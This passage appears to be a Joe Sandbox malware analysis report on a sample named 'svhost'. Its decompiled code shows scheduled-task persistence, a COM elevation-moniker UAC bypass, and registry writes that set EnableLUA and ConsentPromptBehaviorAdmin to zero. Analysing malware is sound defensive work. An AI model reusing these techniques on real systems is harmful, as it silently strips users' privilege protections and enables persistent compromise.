																	E00E57B40( &_v420);
																	_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x54))))(_v60, 1);
																	__eflags = _v100;
																	if(_v100 >= 0) {
																		_v72 = 0;
																		_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x28))))(_v60,  &_v72);
																		_t807 = _v60;
																		 *((intOrPtr*)( *((intOrPtr*)( *_v60 + 8))))(_v60);
																		__eflags = _v100;
																		if(__eflags >= 0) {
																			E00E68360(_t732,  &_v468, _t1032, _t1033, __eflags,  &_v444, E00E70770(_t732,  &_v468, _t1032, _t1033, __eflags,  &_v468, L"PT", E00E6D560(_t807, __eflags,  &_v492, _a8)), "M");
																			_t1043 = _t1040 + 0x20;
																			_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v72 + 0x20))))(_v72, E00E6F440(E00E6F380( &_v156, E00E57A40())));
																			E00E6F420( &_v156);
																			E00E57B40( &_v444);
																			E00E57B40( &_v468);
																			E00E57B40( &_v492);
																			 *((intOrPtr*)( *((intOrPtr*)( *_v72 + 8))))(_v72);
																			__eflags = _v100;
																			if(_v100 >= 0) {
																				_v76 = 0;
																				_t563 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x44))))(_v48,  &_v76);
																				__eflags = _t563;
																				if(_t563 >= 0) {
																					_v80 = 0;
																					_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v76 + 0x30))))(_v76, 0,  &_v80);
																					 *((intOrPtr*)( *((intOrPtr*)( *_v76 + 8))))(_v76);
																					__eflags = _v100;
																					if(_v100 >= 0) {
																						_v84 = 0;
																						_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v80))))(_v80, 0xec82bc,  &_v84);
																						 *((intOrPtr*)( *((intOrPtr*)( *_v80 + 8))))(_v80);
																						__eflags = _v100;
																						if(_v100 >= 0) {
																							_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v84 + 0x2c))))(_v84, E00E6F440(E00E6F380( &_v160, E00E57A40())));
																							E00E6F420( &_v160);
																							__eflags = _v100;
																							if(_v100 >= 0) {
																								_t582 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x2c))))(_v48,  &_v92);
																								__eflags = _t582;
																								if(_t582 >= 0) {
																									 *((intOrPtr*)( *((intOrPtr*)( *_v92 + 0x98))))(_v92, 0xffffffff);
																									 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x30))))(_v48, _v92);
																								}
																								_v96 = 0;
																								_t583 = E00E6F6C0( &_v396, 0xee4dbc);
																								_v252 =  *_t583;
																								_v248 =  *((intOrPtr*)(_t583 + 4));
																								_v244 =  *((intOrPtr*)(_t583 + 8));
																								_v240 =  *((intOrPtr*)(_t583 + 0xc));
																								_t585 = E00E6F650( &_v380, E00E6F2E0( &_v172, L""));
																								_v268 =  *_t585;
																								_v264 =  *((intOrPtr*)(_t585 + 4));
																								_v260 =  *((intOrPtr*)(_t585 + 8));
																								_v256 =  *((intOrPtr*)(_t585 + 0xc));
																								_t587 = E00E6F650( &_v364, E00E6F2E0( &_v168, 0xed26b6));
																								_v284 =  *_t587;
																								_v280 =  *((intOrPtr*)(_t587 + 4));
																								_v276 =  *((intOrPtr*)(_t587 + 8));
																								_v272 =  *((intOrPtr*)(_t587 + 0xc));
																								_t1044 = _t1043 - 0x10;
																								_t845 = _t1044;
																								 *_t845 = _v252;
																								 *((intOrPtr*)(_t845 + 4)) = _v248;
																								 *((intOrPtr*)(_t845 + 8)) = _v244;
																								 *((intOrPtr*)(_t845 + 0xc)) = _v240;
																								_t1045 = _t1044 - 0x10;
																								_t846 = _t1045;
																								 *_t846 = _v268;
																								 *((intOrPtr*)(_t846 + 4)) = _v264;
																								 *((intOrPtr*)(_t846 + 8)) = _v260;
																								 *((intOrPtr*)(_t846 + 0xc)) = _v256;
																								_t847 = _t1045 - 0x10;
																								 *_t847 = _v284;
																								 *((intOrPtr*)(_t847 + 4)) = _v280;
																								 *((intOrPtr*)(_t847 + 8)) = _v276;
																								 *((intOrPtr*)(_t847 + 0xc)) = _v272;
																								_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v52 + 0x44))))(_v52, E00E6F440(E00E6F380( &_v164, E00E57A40())), _v48, 6, 0,  &_v96);
																								E00E6F420( &_v164);
																								E00E6F710( &_v364);
																								E00E6F420( &_v168);
																								E00E6F710( &_v380);
																								E00E6F420( &_v172);
																								E00E6F710( &_v396);
																								__eflags = _v100;
																								if(_v100 >= 0) {
																									 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
																									 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
																									_t929 =  *_v96;
																									 *((intOrPtr*)( *((intOrPtr*)( *_v96 + 8))))(_v96);
																									__imp__CoUninitialize();
																									_v119 = 1;
																									E00E57B40( &_v44);
																								} else {
																									 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
																									_t929 =  *_v48;
																									 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
																									__imp__CoUninitialize();
																									_v118 = 0;
																									E00E57B40( &_v44);
																								}
																							} else {
																								 *((intOrPtr*)( *((intOrPtr*)( *_v84 + 8))))(_v84);
																								 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
																								_t929 = _v48;
																								 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
																								__imp__CoUninitialize();
																								_v117 = 0;
																								E00E57B40( &_v44);
																							}
																						} else {
																							 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
																							_t638 =  *_v48;
																							_t929 =  *(_t638 + 8);
																							 *( *(_t638 + 8))(_v48);
																							__imp__CoUninitialize();
																							_v116 = 0;
																							E00E57B40( &_v44);
																						}
																					} else {
																						 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
																						_t929 = _v48;
																						 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
																						__imp__CoUninitialize();
																						_v115 = 0;
																						E00E57B40( &_v44);
																					}
																				} else {
																					 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
																					_t929 =  *_v48;
																					 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
																					__imp__CoUninitialize();
																					_v114 = 0;
																					E00E57B40( &_v44);
																				}
																			} else {
																				 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
																				_t929 = _v48;
																				 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
																				__imp__CoUninitialize();
																				_v113 = 0;
																				E00E57B40( &_v44);
																			}
																		} else {
																			 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
																			_t929 =  *_v48;
																			 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
																			__imp__CoUninitialize();
																			_v112 = 0;
																			E00E57B40( &_v44);
																		}
																	} else {
																		 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
																		 *((intOrPtr*)( *((intOrPtr*)( *_v60 + 8))))(_v60);
																		_t675 =  *_v48;
																		_t929 =  *(_t675 + 8);
																		 *( *(_t675 + 8))(_v48);
																		__imp__CoUninitialize();
																		_v111 = 0;
																		E00E57B40( &_v44);
																	}
																} else {
																	 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
																	_t929 =  *_v48;
																	 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
																	__imp__CoUninitialize();
																	_v110 = 0;
																	E00E57B40( &_v44);
																}
															} else {
																 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
																_t688 =  *_v48;
																_t929 =  *(_t688 + 8);
																 *( *(_t688 + 8))(_v48);
																__imp__CoUninitialize();
																_v109 = 0;
																E00E57B40( &_v44);
															}
														} else {
															 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
															_t929 = _v48;
															 *((intOrPtr*)( *((intOrPtr*)( *_v48 + 8))))(_v48);
															__imp__CoUninitialize();
															_v108 = 0;
															E00E57B40( &_v44);
														}
													} else {
														 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
														_t701 =  *_v48;
														_t929 =  *(_t701 + 8);
														 *( *(_t701 + 8))(_v48);
														__imp__CoUninitialize();
														_v107 = 0;
														E00E57B40( &_v44);
													}
												} else {
													 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
													_t707 =  *_v48;
													_t929 =  *(_t707 + 8);
													 *( *(_t707 + 8))(_v48);
													__imp__CoUninitialize();
													_v106 = 0;
													E00E57B40( &_v44);
												}
											} else {
												_t929 =  *_v52;
												 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 8))))(_v52);
												__imp__CoUninitialize();
												_v120 = 0;
												E00E57B40( &_v44);
											}
										} else {
											_t715 =  *_v56;
											_t929 =  *(_t715 + 8);
											 *( *(_t715 + 8))(_v56);
											__imp__CoUninitialize();
											_v105 = 0;
											E00E57B40( &_v44);
										}
									} else {
										_t929 = _v56;
										 *((intOrPtr*)( *((intOrPtr*)( *_v56 + 8))))(_v56);
										__imp__CoUninitialize();
										_v103 = 0;
										E00E57B40( &_v44);
									}
								} else {
									__imp__CoUninitialize();
									_v101 = 0;
									E00E57B40( &_v44);
								}
							} else {
								__imp__CoUninitialize();
								_v123 = 0;
								E00E57B40( &_v44);
							}
						} else {
							_v122 = 0;
							E00E57B40( &_v44);
						}
					} else {
						_v121 = 0;
						E00E57B40( &_v44);
					}
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t732, _v20 ^ _t1034, _t929, _t1032, _t1033);
			}






































































































































                                      0x00e6f730
                                      0x00e6f730
                                      0x00e6f730
                                      0x00e6f730
                                      0x00e6f733
                                      0x00e6f735
                                      0x00e6f740
                                      0x00e6f741
                                      0x00e6f747
                                      0x00e6f74c
                                      0x00e6f74e
                                      0x00e6f751
                                      0x00e6f755
                                      0x00e6f75b
                                      0x00e6f76b
                                      0x00e6f781
                                      0x00e6f789
                                      0x00e6f78e
                                      0x00e6f791
                                      0x00e6f793
                                      0x00e6f7ad
                                      0x00e6f7b3
                                      0x00e6f7b5
                                      0x00e6f7dd
                                      0x00e6f7e3
                                      0x00e6f7e5
                                      0x00e6f801
                                      0x00e6f808
                                      0x00e6f81a
                                      0x00e6f820
                                      0x00e6f822
                                      0x00e6f844
                                      0x00e6f84b
                                      0x00e6f854
                                      0x00e6f85d
                                      0x00e6f866
                                      0x00e6f872
                                      0x00e6f879
                                      0x00e6f882
                                      0x00e6f88b
                                      0x00e6f894
                                      0x00e6f8a0
                                      0x00e6f8a7
                                      0x00e6f8b0
                                      0x00e6f8b9
                                      0x00e6f8c2
                                      0x00e6f8ce
                                      0x00e6f8d5
                                      0x00e6f8de
                                      0x00e6f8e7
                                      0x00e6f8f0
                                      0x00e6f8f6
                                      0x00e6f8f9
                                      0x00e6f901
                                      0x00e6f909
                                      0x00e6f912
                                      0x00e6f91b
                                      0x00e6f91e
                                      0x00e6f921
                                      0x00e6f929
                                      0x00e6f931
                                      0x00e6f93a
                                      0x00e6f943
                                      0x00e6f946
                                      0x00e6f949
                                      0x00e6f951
                                      0x00e6f959
                                      0x00e6f962
                                      0x00e6f96b
                                      0x00e6f96e
                                      0x00e6f971
                                      0x00e6f979
                                      0x00e6f981
                                      0x00e6f98a
                                      0x00e6f993
                                      0x00e6f9a2
                                      0x00e6f9a4
                                      0x00e6f9a6
                                      0x00e6f9b4
                                      0x00e6f9a8
                                      0x00e6f9a8
                                      0x00e6f9a8
                                      0x00e6f9c4
                                      0x00e6f9cd
                                      0x00e6f9d8
                                      0x00e6f9e3
                                      0x00e6f9ee
                                      0x00e6f9f7
                                      0x00e6f9f9
                                      0x00e6fa23
                                      0x00e6fa52
                                      0x00e6fa54
                                      0x00e6fa56
                                      0x00e6fa61
                                      0x00e6fa58
                                      0x00e6fa58
                                      0x00e6fa58
                                      0x00e6fa6b
                                      0x00e6fa74
                                      0x00e6fa7d
                                      0x00e6fa7f
                                      0x00e6fad3
                                      0x00e6fadb
                                      0x00e6fae0
                                      0x00e6fafb
                                      0x00e6fb0a
                                      0x00e6fb0c
                                      0x00e6fb10
                                      0x00e6fb3a
                                      0x00e6fb51
                                      0x00e6fb53
                                      0x00e6fb55
                                      0x00e6fb99
                                      0x00e6fb9b
                                      0x00e6fb9f
                                      0x00e6fbd7
                                      0x00e6fbee
                                      0x00e6fbf0
                                      0x00e6fbf2
                                      0x00e6fc2a
                                      0x00e6fc45
                                      0x00e6fc54
                                      0x00e6fc56
                                      0x00e6fc5a
                                      0x00e6fc92
                                      0x00e6fcaf
                                      0x00e6fcbe
                                      0x00e6fcc0
                                      0x00e6fcc4
                                      0x00e6fd20
                                      0x00e6fd28
                                      0x00e6fd39
                                      0x00e6fd65
                                      0x00e6fd6d
                                      0x00e6fd78
                                      0x00e6fd8d
                                      0x00e6fd90
                                      0x00e6fd94
                                      0x00e6fdda
                                      0x00e6fdf3
                                      0x00e6fdfb
                                      0x00e6fe02
                                      0x00e6fe04
                                      0x00e6fe08
                                      0x00e6fe75
                                      0x00e6fe7a
                                      0x00e6fea6
                                      0x00e6feaf
                                      0x00e6feba
                                      0x00e6fec5
                                      0x00e6fed0
                                      0x00e6fee1
                                      0x00e6fee3
                                      0x00e6fee7
                                      0x00e6ff1f
                                      0x00e6ff36
                                      0x00e6ff38
                                      0x00e6ff3a
                                      0x00e6ff72
                                      0x00e6ff8d
                                      0x00e6ff9c
                                      0x00e6ff9e
                                      0x00e6ffa2
                                      0x00e6ffda
                                      0x00e6fff7
                                      0x00e70006
                                      0x00e70008
                                      0x00e7000c
                                      0x00e7006e
                                      0x00e70077
                                      0x00e7007c
                                      0x00e70080
                                      0x00e700d6
                                      0x00e700d8
                                      0x00e700da
                                      0x00e700ed
                                      0x00e700ff
                                      0x00e700ff
                                      0x00e70101
                                      0x00e70113
                                      0x00e7011a
                                      0x00e70123
                                      0x00e7012c
                                      0x00e70135
                                      0x00e70152
                                      0x00e70159
                                      0x00e70162
                                      0x00e7016b
                                      0x00e70174
                                      0x00e70191
                                      0x00e70198
                                      0x00e701a1
                                      0x00e701aa
                                      0x00e701b3
                                      0x00e701bd
                                      0x00e701c0
                                      0x00e701c8
                                      0x00e701d0
                                      0x00e701d9
                                      0x00e701e2
                                      0x00e701e7
                                      0x00e701ea
                                      0x00e701f2
                                      0x00e701fa
                                      0x00e70203
                                      0x00e7020c
                                      0x00e70212
                                      0x00e7021a
                                      0x00e70222
                                      0x00e7022b
                                      0x00e70234
                                      0x00e70267
                                      0x00e70270
                                      0x00e7027b
                                      0x00e70286
                                      0x00e70291
                                      0x00e7029c
                                      0x00e702a7
                                      0x00e702ac
                                      0x00e702b0
                                      0x00e702f1
                                      0x00e702ff
                                      0x00e70304
                                      0x00e7030d
                                      0x00e7030f
                                      0x00e70315
                                      0x00e7031c
                                      0x00e702b2
                                      0x00e702be
                                      0x00e702c3
                                      0x00e702cc
                                      0x00e702ce
                                      0x00e702d4
                                      0x00e702db
                                      0x00e702e0
                                      0x00e70082
                                      0x00e7008e
                                      0x00e7009c
                                      0x00e700a3
                                      0x00e700aa
                                      0x00e700ac
                                      0x00e700b2
                                      0x00e700b9
                                      0x00e700be
                                      0x00e7000e
                                      0x00e7001a
                                      0x00e7001f
                                      0x00e70025
                                      0x00e70028
                                      0x00e7002a
                                      0x00e70030
                                      0x00e70037
                                      0x00e7003c
                                      0x00e6ffa4
                                      0x00e6ffb0
                                      0x00e6ffb7
                                      0x00e6ffbe
                                      0x00e6ffc0
                                      0x00e6ffc6
                                      0x00e6ffcd
                                      0x00e6ffd2
                                      0x00e6ff3c
                                      0x00e6ff48
                                      0x00e6ff4d
                                      0x00e6ff56
                                      0x00e6ff58
                                      0x00e6ff5e
                                      0x00e6ff65
                                      0x00e6ff6a
                                      0x00e6fee9
                                      0x00e6fef5
                                      0x00e6fefc
                                      0x00e6ff03
                                      0x00e6ff05
                                      0x00e6ff0b
                                      0x00e6ff12
                                      0x00e6ff17
                                      0x00e6fe0a
                                      0x00e6fe16
                                      0x00e6fe1b
                                      0x00e6fe24
                                      0x00e6fe26
                                      0x00e6fe2c
                                      0x00e6fe33
                                      0x00e6fe38
                                      0x00e6fd96
                                      0x00e6fda2
                                      0x00e6fdb0
                                      0x00e6fdb5
                                      0x00e6fdbb
                                      0x00e6fdbe
                                      0x00e6fdc0
                                      0x00e6fdc6
                                      0x00e6fdcd
                                      0x00e6fdd2
                                      0x00e6fcc6
                                      0x00e6fcd2
                                      0x00e6fcd7
                                      0x00e6fce0
                                      0x00e6fce2
                                      0x00e6fce8
                                      0x00e6fcef
                                      0x00e6fcf4
                                      0x00e6fc5c
                                      0x00e6fc68
                                      0x00e6fc6d
                                      0x00e6fc73
                                      0x00e6fc76
                                      0x00e6fc78
                                      0x00e6fc7e
                                      0x00e6fc85
                                      0x00e6fc8a
                                      0x00e6fbf4
                                      0x00e6fc00
                                      0x00e6fc07
                                      0x00e6fc0e
                                      0x00e6fc10
                                      0x00e6fc16
                                      0x00e6fc1d
                                      0x00e6fc22
                                      0x00e6fba1
                                      0x00e6fbad
                                      0x00e6fbb2
                                      0x00e6fbb8
                                      0x00e6fbbb
                                      0x00e6fbbd
                                      0x00e6fbc3
                                      0x00e6fbca
                                      0x00e6fbcf
                                      0x00e6fb57
                                      0x00e6fb63
                                      0x00e6fb68
                                      0x00e6fb6e
                                      0x00e6fb71
                                      0x00e6fb73
                                      0x00e6fb79
                                      0x00e6fb80
                                      0x00e6fb85
                                      0x00e6fb12
                                      0x00e6fb15
                                      0x00e6fb1e
                                      0x00e6fb20
                                      0x00e6fb26
                                      0x00e6fb2d
                                      0x00e6fb32
                                      0x00e6fa81
                                      0x00e6fa84
                                      0x00e6fa8a
                                      0x00e6fa8d
                                      0x00e6fa8f
                                      0x00e6fa95
                                      0x00e6fa9c
                                      0x00e6faa1
                                      0x00e6f9fb
                                      0x00e6fa00
                                      0x00e6fa07
                                      0x00e6fa09
                                      0x00e6fa0f
                                      0x00e6fa16
                                      0x00e6fa1b
                                      0x00e6f824
                                      0x00e6f824
                                      0x00e6f82a
                                      0x00e6f831
                                      0x00e6f836
                                      0x00e6f7e7
                                      0x00e6f7e7
                                      0x00e6f7ed
                                      0x00e6f7f4
                                      0x00e6f7f9
                                      0x00e6f7b7
                                      0x00e6f7b7
                                      0x00e6f7be
                                      0x00e6f7c3
                                      0x00e6f795
                                      0x00e6f795
                                      0x00e6f79c
                                      0x00e6f7a1
                                      0x00e6f793
                                      0x00e70327
                                      0x00e7033c

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6F761
                                      • std::ios_base::good.LIBCPMTD ref: 00E6F789
                                      • task.LIBCPMTD ref: 00E6F79C
                                      • CoInitializeEx.OLE32(00000000,00000000,?,221CAC15), ref: 00E6F7AD
                                      • task.LIBCPMTD ref: 00E6F7BE
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00E6F7DD
                                      • CoUninitialize.OLE32 ref: 00E6F7E7
                                      • task.LIBCPMTD ref: 00E6F7F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$Initializestd::ios_base::good$SecurityUninitialize
                                      • String ID: Trigger1
                                      • API String ID: 3657613080-1869269927
                                      • Opcode ID: 83cc277369762a5748a2bfa29323b78858cdddf270352da74808b9ff608781ef
                                      • Instruction ID: 40c2d88759c7932cf05eb4eb8a8b6be8c0b38b7bc0a51c11d3fffb448fa67f4e
                                      • Opcode Fuzzy Hash: 83cc277369762a5748a2bfa29323b78858cdddf270352da74808b9ff608781ef
                                      • Instruction Fuzzy Hash: 4592B874A14218DFCB14DFA8E894EDDB7B6BF88300F149199E519AB361DB30AD86CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E70C80 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00E70CBB
                                      • CLSIDFromString.OLE32({3E5FC7F9-9A51-4367-9063-A120244FBEC7},?), ref: 00E70CEF
                                      • IIDFromString.OLE32({6EDD6D74-C007-4E75-B76A-E5740995E24C},?), ref: 00E70D23
                                      • CoGetObject.OLE32(?,00000024,?,00000000), ref: 00E70DC4
                                      • task.LIBCPMTD ref: 00E70E24
                                      • CoUninitialize.OLE32 ref: 00E70E3D
                                      Strings
                                      • Elevation:Administrator!new:, xrefs: 00E70D47
                                      • {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00E70D60
                                      • {6EDD6D74-C007-4E75-B76A-E5740995E24C}, xrefs: 00E70D1E
                                      • $, xrefs: 00E70D8A
                                      • {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 00E70CEA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FromString$InitializeObjectUninitializetask
                                      • String ID: $$Elevation:Administrator!new:${3E5FC7F9-9A51-4367-9063-A120244FBEC7}${3E5FC7F9-9A51-4367-9063-A120244FBEC7}${6EDD6D74-C007-4E75-B76A-E5740995E24C}
                                      • API String ID: 780495086-220260661
                                      • Opcode ID: d951cc5b706ff3fdffc3273f12f72aeccf58b7afee90d8467e6e5a35d7286264
                                      • Instruction ID: 6416fa7d7faad92523c7f609e07577538424f485126dc736ff3ec5a4066bf9b2
                                      • Opcode Fuzzy Hash: d951cc5b706ff3fdffc3273f12f72aeccf58b7afee90d8467e6e5a35d7286264
                                      • Instruction Fuzzy Hash: AE416DB1944318EFCB24EF64DC89BDAB7B4AB48700F0056E9E50DB6291EB755A88CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E70BB0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 62registryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E70BB0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _v8;
				char _v12;
				char _v16;
				void* _v20;
				intOrPtr _v24;
				signed int _t15;
				void* _t28;
				void* _t38;
				void* _t39;
				signed int _t40;

				_t39 = __esi;
				_t38 = __edi;
				_t28 = __ebx;
				_t15 =  *0xeef074; // 0x221cac15
				_v8 = _t15 ^ _t40;
				_v24 = __ecx;
				if((E00E70AE0(_v24) & 0x000000ff) != 0) {
					if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0x20006,  &_v20) == 0) {
						_v12 = 0;
						RegSetValueExW(_v20, L"EnableLUA", 0, 4,  &_v12, 4);
						RegCloseKey(_v20);
					}
					_t36 =  &_v20;
					if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0x20006,  &_v20) == 0) {
						_v16 = 0;
						RegSetValueExW(_v20, L"ConsentPromptBehaviorAdmin", 0, 4,  &_v16, 4);
						_t36 = _v20;
						RegCloseKey(_v20);
					}
				}
				_t14 =  &_v8; // 0xe55d52
				return E00E89A35(_t28,  *_t14 ^ _t40, _t36, _t38, _t39);
			}













                                      0x00e70bb0
                                      0x00e70bb0
                                      0x00e70bb0
                                      0x00e70bb6
                                      0x00e70bbd
                                      0x00e70bc0
                                      0x00e70bd0
                                      0x00e70bf3
                                      0x00e70bf5
                                      0x00e70c0f
                                      0x00e70c19
                                      0x00e70c19
                                      0x00e70c1f
                                      0x00e70c3c
                                      0x00e70c3e
                                      0x00e70c58
                                      0x00e70c5e
                                      0x00e70c62
                                      0x00e70c62
                                      0x00e70c3c
                                      0x00e70c68
                                      0x00e70c75

                                      APIs
                                        • Part of subcall function 00E70AE0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00E70B04
                                        • Part of subcall function 00E70AE0: OpenProcessToken.ADVAPI32(00000000), ref: 00E70B0B
                                        • Part of subcall function 00E70AE0: GetTokenInformation.ADVAPI32(00000000,00000014(TokenIntegrityLevel),?,00000004,00000004), ref: 00E70B31
                                        • Part of subcall function 00E70AE0: CloseHandle.KERNEL32(00000000), ref: 00E70B5B
                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00020006,?,?,?,?,?,00E55D52,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E70BEB
                                      • RegSetValueExW.ADVAPI32(?,EnableLUA,00000000,00000004,00000000,00000004), ref: 00E70C0F
                                      • RegCloseKey.ADVAPI32(?), ref: 00E70C19
                                      • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00000000,00020006,?,?,?,?,?,00E55D52,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E70C34
                                      • RegSetValueExW.ADVAPI32(?,ConsentPromptBehaviorAdmin,00000000,00000004,00000000,00000004), ref: 00E70C58
                                      • RegCloseKey.ADVAPI32(?), ref: 00E70C62
                                      Strings
                                      • EnableLUA, xrefs: 00E70C06
                                      • R], xrefs: 00E70C68
                                      • ConsentPromptBehaviorAdmin, xrefs: 00E70C4F
                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00E70C2A
                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00E70BE1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpen$ProcessTokenValue$CurrentHandleInformation
                                      • String ID: ConsentPromptBehaviorAdmin$EnableLUA$R]$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                      • API String ID: 884832700-1360035613
                                      • Opcode ID: 69bc45f4f20ca7bfd9519a87bf0f53d6e9182cc213850ecb91c6c5ca181bdaf6
                                      • Instruction ID: 1aa9d792743c00b6e589f8f8cb65b7ccfcdf4baf8500c2819bffecdb7f178a0c
                                      • Opcode Fuzzy Hash: 69bc45f4f20ca7bfd9519a87bf0f53d6e9182cc213850ecb91c6c5ca181bdaf6
                                      • Instruction Fuzzy Hash: 76116AB0A80319ABEB20DBA1DC46F7EB379BB44B00F104558B715BA1D0DA70A908CB55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E65DA0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 81memoryencryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E65DA0(void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi, char _a4) {
				signed int _v8;
				int _v12;
				char _v13;
				void* _v20;
